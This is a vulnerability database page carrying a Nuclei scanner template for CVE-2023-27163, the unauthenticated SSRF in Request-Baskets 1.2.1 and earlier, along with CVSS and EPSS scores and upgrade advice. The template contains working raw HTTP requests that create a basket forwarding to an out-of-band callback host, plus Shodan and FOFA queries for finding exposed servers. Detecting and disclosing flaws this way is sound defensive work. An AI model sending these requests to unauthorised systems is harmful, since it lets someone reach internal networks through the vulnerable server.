Lucene search
K

Request-Baskets <= 1.2.1 - Server Side Request Forgery

🗓️ 08 Jul 2026 05:22:06Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 13 Views

Unauthenticated SSRF in Request-Baskets via forward_url during basket creation (versions ≤ 1.2.1).

Related
Refs
Code
id: CVE-2023-27163

info:
  name: Request-Baskets <= 1.2.1 - Server Side Request Forgery
  author: Jaenact
  severity: medium
  description: |
    Request-Baskets <= 1.2.1 allows unauthenticated SSRF via the forward_url parameter when creating a new basket.
  impact: |
    Attackers can perform SSRF attacks to access internal network resources, scan internal systems, or interact with services that should not be accessible from external networks.
  remediation: |
    Upgrade to Request-Baskets version 1.2.2 or later that addresses this SSRF vulnerability.
  reference:
    - https://github.com/darklynx/request-baskets
    - https://hub.docker.com/r/darklynx/request-baskets
    - https://infosecwriteups.com/exploit-analysis-request-baskets-v1-2-1-server-side-request-forgery-ssrf-688fffd1f424
    - https://nvd.nist.gov/vuln/detail/CVE-2023-27163
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N
    cvss-score: 6.5
    cve-id: CVE-2023-27163
    epss-score: 0.07497
    epss-percentile: 0.9375
    cwe-id: CWE-918
    cpe: cpe:2.3:a:rbaskets:request_baskets:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: darklynx
    product: request-baskets
    shodan-query: http.html:"Request-Baskets"
    fofa-query: body="Request-Baskets"
  tags: cve,cve2023,ssrf,request-baskets,oast,proxy,vkev,vuln

flow: http(1) && http(2)

variables:
  bucketname: "{{rand_base(7)}}"

http:
  - raw:
      - |
        POST /api/baskets/{{bucketname}} HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {
          "forward_url": "http://{{interactsh-url}}",
          "proxy_response": true,
          "insecure_tls": false,
          "expand_path": true,
          "capacity": 250
        }

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 201'
          - 'contains(body, "token\":")'
          - 'contains(content_type, "application/json")'
        condition: and
        internal: true

  - raw:
      - |
        GET /{{bucketname}} HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"
# digest: 4a0a00473045022022ec50a07e174353e95d6bfa3be6bf6b4751604a57a913df470859af151cd2e1022100b932f3a0ea9925ccf28b603d1af59a74e3674ec6e8900c3084571a3087da10fd:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.6Medium risk
Vulners AI Score6.6
CVSS 3.16.5
EPSS0.07497
SSVC
13